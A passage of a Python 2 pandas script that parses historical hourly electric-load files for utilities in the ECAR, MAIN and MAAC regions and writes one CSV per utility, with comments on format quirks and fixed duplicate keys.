1997 : pd.read_fwf('%s/ecar/1997/OVEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/OVEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/OVEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/OVEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/OVEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/OVEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/OVEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/OVEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
15470 : {
1993 : pd.read_fwf('%s/ecar/1993/PSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/PSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/PSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
17633 : {
1993 : pd.read_fwf('%s/ecar/1993/SIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/SIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/SIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/SIGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/SIGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/SIGE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/SIGE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/SIGE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/SIGE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/SIGE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/SIGE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
18997 : {
1993 : pd.read_fwf('%s/ecar/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/TECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/TECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40211 : {
1994 : pd.read_fwf('%s/ecar/1994/WVPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/ecar/2003/WVPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/WVPA04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
32208 : {
1997 : pd.read_fwf('%s/ecar/1997/FE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/FE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/FE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/FE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/FE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/FE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/FE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/FE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
'mccp' : {
1993 : pd.read_fwf('%s/ecar/1993/MCCP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/MCCP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/MCCP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/MCCP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/MCCP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/MCCP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/MCCP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/MCCP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
}
}
if not os.path.exists('./ecar'):
os.mkdir('ecar')
for k in ecar.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(ecar[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ecar[k][i]))) for i in ecar[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./ecar/%s.csv' % k)
###### MAIN
# CECO : 4110
# CILC: 3252 <- Looks like something is getting cut off from 1993-2000
# CIPS: 3253
# IPC: 9208
# MGE: 11479
# SIPC: 17632
# SPIL: 17828
# UE: 19436
# WEPC: 20847
# WPL: 20856
# WPS: 20860
# UPP: 19578
# WPPI: 20858
# AMER: 19436
# CWL: 4045
# NERC "MAIN" region: hourly load keyed EIA utility id -> {year: ndarray}.
# Source-file layout varies wildly by utility and year (fixed-width, CSV,
# TSV, Excel), hence the per-file parsing recipe on every line.
#
# FIX: the original dict literal defined key 19436 twice (UE 1995-97, then
# AMER 1998-2004); Python keeps only the last duplicate, so the UE years were
# silently discarded.  The two entries are merged below (year keys do not
# collide).  The original also defined 2000 twice inside 11479; the dead
# first (read_csv) recipe is dropped, keeping the read_fwf one that actually
# took effect.
main = {
    4110 : {  # CECO
        1993 : pd.read_fwf('%s/main/1993/CECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_csv('%s/main/1995/CECO95' % (fulldir), skiprows=3, header=None)[0].values,
        1996 : pd.read_csv('%s/main/1996/CECO96' % (fulldir), skiprows=4, header=None)[1].values,
        1997 : pd.read_csv('%s/main/1997/CECO97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None)[3].values,
        1998 : pd.read_csv('%s/main/1998/CECO98' % (fulldir), sep='\s', skipinitialspace=True, skiprows=5, header=None)[5].values,
        1999 : pd.read_csv('%s/main/1999/CECO99' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
        2000 : pd.read_csv('%s/main/2000/CECO00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
        2001 : pd.read_csv('%s/main/2001/CECO01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
        2002 : pd.read_csv('%s/main/2002/CECO02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None)[2].values
    },
    3252 : {  # CILC -- see note above: 1993-2000 values may be truncated
        1993 : pd.read_fwf('%s/main/1993/CILC93' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        1994 : pd.read_fwf('%s/main/1994/CILC94' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        1995 : pd.read_fwf('%s/main/1995/CILC95' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        1996 : pd.read_fwf('%s/main/1996/CILC96' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        1997 : pd.read_fwf('%s/main/1997/CILC97' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        1998 : pd.read_fwf('%s/main/1998/CILC98' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        1999 : pd.read_fwf('%s/main/1999/CILC99' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
        2000 : pd.read_excel('%s/main/2000/CILC00' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
        2001 : pd.read_excel('%s/main/2001/CILC01' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
        2002 : pd.read_excel('%s/main/2002/CILC02' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
        2003 : pd.read_csv('%s/main/2003/CILC03' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].values
    },
    3253 : {  # CIPS
        1993 : pd.read_fwf('%s/main/1993/CIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/main/1994/CIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/main/1995/CIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
        1996 : pd.read_fwf('%s/main/1996/CIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
        1997 : pd.read_fwf('%s/main/1997/CIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
    },
    9208 : {  # IPC
        1993 : pd.read_csv('%s/main/1993/IPC93' % (fulldir), skipfooter=1, header=None)[2].values,
        1994 : pd.read_csv('%s/main/1994/IPC94' % (fulldir), skipfooter=1, header=None)[2].values,
        1995 : pd.read_csv('%s/main/1995/IPC95' % (fulldir), skipfooter=1, header=None)[4].astype(str).str.replace('.', '0').astype(float).values,
        1996 : pd.read_csv('%s/main/1996/IPC96' % (fulldir)).iloc[:, -1].values,
        1997 : pd.read_csv('%s/main/1997/IPC97' % (fulldir)).iloc[:, -1].values,
        1998 : pd.read_excel('%s/main/1998/IPC98' % (fulldir)).iloc[:, -1].values,
        1999 : pd.read_csv('%s/main/1999/IPC99' % (fulldir), skiprows=2, header=None)[1].values,
        2000 : pd.read_excel('%s/main/2000/IPC00' % (fulldir), skiprows=1).iloc[:, -1].values,
        2001 : pd.read_excel('%s/main/2001/IPC01' % (fulldir), skiprows=1).iloc[:, -1].values,
        2002 : pd.read_excel('%s/main/2002/IPC02' % (fulldir), skiprows=4).iloc[:, -1].values,
        2003 : pd.read_excel('%s/main/2003/IPC03' % (fulldir), skiprows=1).iloc[:, -1].values,
        2004 : pd.read_excel('%s/main/2004/IPC04' % (fulldir), skiprows=1).iloc[:, -1].values
    },
    11479 : {  # MGE
        1993 : pd.read_fwf('%s/main/1993/MGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=4).iloc[:, 1:].dropna().astype(float).values.ravel(),
        1995 : pd.read_csv('%s/main/1995/MGE95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
        1997 : pd.read_csv('%s/main/1997/MGE97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=12, header=None).iloc[:-1, 2].astype(float).values,
        1998 : pd.read_csv('%s/main/1998/MGE98' % (fulldir), sep=' ', skipinitialspace=True).iloc[:-1]['LOAD'].astype(float).values,
        1999 : pd.read_csv('%s/main/1999/MGE99' % (fulldir), sep=' ', skiprows=2, header=None, skipinitialspace=True).iloc[:-2, 2].astype(float).values,
        # NOTE(review): the original also had a read_csv recipe for 2000 that
        # this duplicate key silently replaced; only this read_fwf one ever ran.
        2000 : pd.read_fwf('%s/main/2000/MGE00' % (fulldir), skiprows=2)['VMS_DATE'].iloc[:-2].str.split().str[-1].astype(float).values,
        2001 : pd.read_fwf('%s/main/2001/MGE01' % (fulldir), skiprows=1, header=None).iloc[:-2, 2].values,
        2002 : pd.read_fwf('%s/main/2002/MGE02' % (fulldir), skiprows=4, header=None).iloc[:-1, 0].str.split().str[-1].astype(float).values
    },
    17632 : {  # SIPC
        1994 : pd.read_csv('%s/main/1994/SIPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
        1996 : pd.read_csv('%s/main/1996/SIPC96' % (fulldir), engine='python', header=None)[0].values,
        1997 : pd.read_csv('%s/main/1997/SIPC97' % (fulldir), engine='python', header=None)[0].values,
        1998 : pd.read_csv('%s/main/1998/SIPC98' % (fulldir), engine='python', header=None)[0].values,
        1999 : pd.read_csv('%s/main/1999/SIPC99' % (fulldir), engine='python', header=None)[0].replace('no data', '0').astype(float).values,
        2000 : pd.read_csv('%s/main/2000/SIPC00' % (fulldir), engine='python', header=None)[0].astype(str).str[:3].astype(float).values,
        2001 : pd.read_csv('%s/main/2001/SIPC01' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
        2002 : pd.read_csv('%s/main/2002/SIPC02' % (fulldir), sep='\t', skiprows=3, header=None)[1].values,
        2003 : pd.read_csv('%s/main/2003/SIPC03' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
        2004 : pd.read_csv('%s/main/2004/SIPC04' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values
    },
    17828 : {  # SPIL
        1993 : pd.read_csv('%s/main/1993/SPIL93' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None).iloc[:, 3:].values.ravel(),
        1994 : pd.read_csv('%s/main/1994/SPIL94' % (fulldir), sep=' ', skipinitialspace=True, skiprows=6, header=None).iloc[:, 3:].values.ravel(),
        1995 : pd.read_csv('%s/main/1995/SPIL95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
        1996 : pd.read_csv('%s/main/1996/SPIL96' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:366, 3:].astype(float).values.ravel(),
        1997 : pd.read_csv('%s/main/1997/SPIL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
        1998 : pd.read_csv('%s/main/1998/SPIL98' % (fulldir), sep='\t', skipinitialspace=True, skiprows=8, header=None).iloc[:, 4:].values.ravel(),
        1999 : pd.read_csv('%s/main/1999/SPIL99' % (fulldir), skiprows=4, header=None)[0].values,
        2000 : pd.read_csv('%s/main/2000/SPIL00' % (fulldir), skiprows=4, header=None)[0].values,
        2001 : pd.read_csv('%s/main/2001/SPIL01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=7, header=None).iloc[:, 5:-1].values.ravel(),
        2002 : pd.read_excel('%s/main/2002/SPIL02' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
        2003 : pd.read_excel('%s/main/2003/SPIL03' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
        2004 : pd.read_excel('%s/main/2004/SPIL04' % (fulldir), sheetname=0, skiprows=5).iloc[:, 3:].values.ravel()
    },
    19436 : {  # UE (1995-97) and its successor AMER (1998-2004) share this id;
               # merged from the two duplicate dict entries in the original.
        1995 : pd.read_fwf('%s/main/1995/UE95' % (fulldir), header=None)[2].values,
        1996 : pd.read_fwf('%s/main/1996/UE96' % (fulldir), header=None)[2].values,
        1997 : pd.read_fwf('%s/main/1997/UE97' % (fulldir), header=None)[2].values,
        1998 : pd.read_csv('%s/main/1998/AMER98' % (fulldir), sep='\t').iloc[:, -1].str.strip().replace('na', 0).astype(float).values,
        1999 : pd.read_csv('%s/main/1999/AMER99' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
        2000 : pd.read_csv('%s/main/2000/AMER00' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
        2001 : pd.read_csv('%s/main/2001/AMER01' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('n/a', 0).astype(float).values,
        2002 : pd.read_csv('%s/main/2002/AMER02' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
        2003 : pd.read_csv('%s/main/2003/AMER03' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
        2004 : pd.read_csv('%s/main/2004/AMER04' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values
    },
    20847 : {  # WEPC
        1993 : pd.read_csv('%s/main/1993/WEPC93' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
        1994 : pd.read_csv('%s/main/1994/WEPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
        1995 : pd.read_csv('%s/main/1995/WEPC95' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
        1996 : pd.read_csv('%s/main/1996/WEPC96' % (fulldir), engine='python', header=None)[0].values,
        1997 : pd.read_excel('%s/main/1997/WEPC97' % (fulldir), header=None)[0].astype(str).str.strip().replace('NA', '0').astype(float).values,
        1998 : pd.read_csv('%s/main/1998/WEPC98' % (fulldir), engine='python', header=None)[0].str.strip().replace('NA', 0).astype(float).values,
        1999 : pd.read_excel('%s/main/1999/WEPC99' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        2000 : pd.read_excel('%s/main/2000/WEPC00' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2001 : pd.read_excel('%s/main/2001/WEPC01' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2002 : pd.read_excel('%s/main/2002/WEPC02' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2003 : pd.read_excel('%s/main/2003/WEPC03' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2004 : pd.read_excel('%s/main/2004/WEPC04' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
    },
    20856 : {  # WPL
        1993 : pd.read_fwf('%s/main/1993/WPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
        1994 : pd.read_fwf('%s/main/1994/WPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
        1995 : pd.read_fwf('%s/main/1995/WPL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_csv('%s/main/1996/WPL96' % (fulldir), header=None, sep='\t').iloc[:, 1:].values.ravel(),
        1997 : pd.read_csv('%s/main/1997/WPL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[2].str.replace(',', '').astype(float).values
    },
    20860 : {  # WPS
        1993 : pd.read_csv('%s/main/1993/WPS93' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).values.ravel(),
        1994 : (pd.read_csv('%s/main/1994/WPS94' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).iloc[:, 1:-1]/100).values.ravel(),
        1995 : pd.read_csv('%s/main/1995/WPS95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=8, header=None, skipfooter=7)[2].values,
        1996 : pd.read_csv('%s/main/1996/WPS96' % (fulldir), sep='\t', skiprows=2).loc[:365, '100':'2400'].astype(float).values.ravel(),
        1997 : pd.read_csv('%s/main/1997/WPS97' % (fulldir), sep='\s', header=None, skipfooter=1)[2].values,
        1998 : pd.read_csv('%s/main/1998/WPS98' % (fulldir), sep='\s', header=None)[2].values,
        1999 : pd.read_excel('%s/main/1999/WPS99' % (fulldir), skiprows=8, skipfooter=8, header=None)[1].values,
        2000 : pd.read_excel('%s/main/2000/WPS00' % (fulldir), sheetname=1, skiprows=5, skipfooter=8, header=None)[2].values,
        2001 : pd.read_excel('%s/main/2001/WPS01' % (fulldir), sheetname=0, skiprows=5, header=None)[2].values,
        2002 : pd.read_csv('%s/main/2002/WPS02' % (fulldir), sep='\s', header=None, skiprows=5)[2].values,
        2003 : pd.read_excel('%s/main/2003/WPS03' % (fulldir), sheetname=1, skiprows=6, header=None)[2].values
    },
    19578 : {  # UPP
        1996 : pd.read_csv('%s/main/1996/UPP96' % (fulldir), header=None, skipfooter=1).iloc[:, -1].values,
        2004 : pd.read_excel('%s/main/2004/UPP04' % (fulldir)).iloc[:, -1].values
    },
    20858 : {  # WPPI
        1997 : pd.read_csv('%s/main/1997/WPPI97' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].values.ravel(),
        1999 : pd.DataFrame([i.split() for i in open('%s/main/1999/WPPI99' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
        2000 : pd.DataFrame([i.split() for i in open('%s/main/2000/WPPI00' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
        2001 : pd.read_excel('%s/main/2001/WPPI01' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel(),
        2002 : pd.read_excel('%s/main/2002/WPPI02' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel()
    },
    4045 : {  # CWL
        2000 : pd.read_excel('%s/main/2000/CWL00' % (fulldir), skiprows=2).iloc[:, 1:].values.ravel(),
        2001 : pd.read_excel('%s/main/2001/CWL01' % (fulldir), skiprows=1).iloc[:, 0].values,
        2002 : pd.read_excel('%s/main/2002/CWL02' % (fulldir), header=None).iloc[:, 0].values,
        2003 : pd.read_excel('%s/main/2003/CWL03' % (fulldir), header=None).iloc[:, 0].values
    }
}
main[20847][1994][main[20847][1994] > 9000] = 0
main[20847][1995][main[20847][1995] > 9000] = 0
main[20847][1996][main[20847][1996] > 9000] = 0
if not os.path.exists('./main'):
os.mkdir('main')
for k in main.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(main[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(main[k][i]))) for i in main[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./main/%s.csv' % k)
# EEI
# Bizarre formatting until 1998
###### MAAC
# AE: 963
# BC: 1167
# DPL: 5027
# PU: 7088
# PN: 14715
# PE: 14940
# PEP: 15270
# PS: 15477
# PJM: 14725
# ALL UTILS
# PJM pool files 1993-96 carry every member utility's rows in one file:
# a label field followed by 12 hourly values per row (two rows per day).
# Load each year once here; the maac dict below slices out each utility.
_pjm_widths = [20] + [5] * 12  # label column + 12 five-char value columns
maac93 = pd.read_fwf('%s/maac/1993/PJM93' % fulldir, widths=_pjm_widths, header=None, skipfooter=1)
maac94 = pd.read_fwf('%s/maac/1994/PJM94' % fulldir, widths=_pjm_widths, header=None, skipfooter=1)
# 1995-96 switched to tab-separated text with the label in column 1.
maac95 = pd.read_csv('%s/maac/1995/PJM95' % fulldir, sep='\t', header=None, skipfooter=1)
maac96 = pd.read_csv('%s/maac/1996/PJM96' % fulldir, sep='\t', header=None, skipfooter=1)
def _util_hours(frame, label_col, pattern, first_value_col):
    """Rows of a pooled PJM table whose label column matches *pattern*
    (a regex, per Series.str.contains), with the hourly value columns
    flattened into one 1-D array."""
    selected = frame[frame[label_col].str.contains(pattern)]
    return selected.iloc[:, first_value_col:].values.ravel()

# MAAC region: hourly load keyed EIA utility id -> {year: ndarray}.
# 1993-96 come from the pooled files loaded above (label col 0 / values 1: in
# the fixed-width years, label col 1 / values 2: in the tab years); 1997 comes
# from per-utility sheets of the PJM97 workbook.  'PE$' anchors the regex so
# PE does not also match the PEP rows.
maac = {
    963 : {  # AE
        1993 : _util_hours(maac93, 0, 'AE', 1),
